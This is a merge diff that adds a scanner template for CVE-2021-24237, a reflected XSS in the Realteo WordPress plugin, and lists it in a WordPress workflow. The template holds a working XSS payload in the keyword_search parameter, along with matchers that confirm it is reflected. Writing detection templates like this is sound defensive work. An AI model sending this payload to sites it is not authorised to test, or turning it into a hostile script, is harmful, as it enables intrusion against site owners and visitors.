Merge pull request #1656 from Akokonunes/patch-4

Create CVE-2021-24237.yaml

cves/2021/CVE-2021-24237.yaml

@@ -0,0 +1,34 @@
+id: CVE-2021-24237
+
+info:
+  author: 0x_Akoko
+  name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS
+  description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius.
+  severity: medium
+  tags: cve,cve2021,realteo,xss,wordpress
+  reference: |
+      - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e
+      - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "autofocus onfocus=alert(/{{randstr}}/);//"
+          - "Nothing found"
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - "text/html"
+        part: header

workflows/wordpress-workflow.yaml

@@ -32,6 +32,7 @@ workflows:
           - template: cves/2020/CVE-2020-35951.yaml
           - template: cves/2020/CVE-2020-35489.yaml
           - template: cves/2021/CVE-2021-24146.yaml
+          - template: cves/2021/CVE-2021-24237.yaml
           - template: cves/2021/CVE-2021-24176.yaml
           - template: cves/2021/CVE-2021-24285.yaml
           - template: cves/2021/CVE-2021-24316.yaml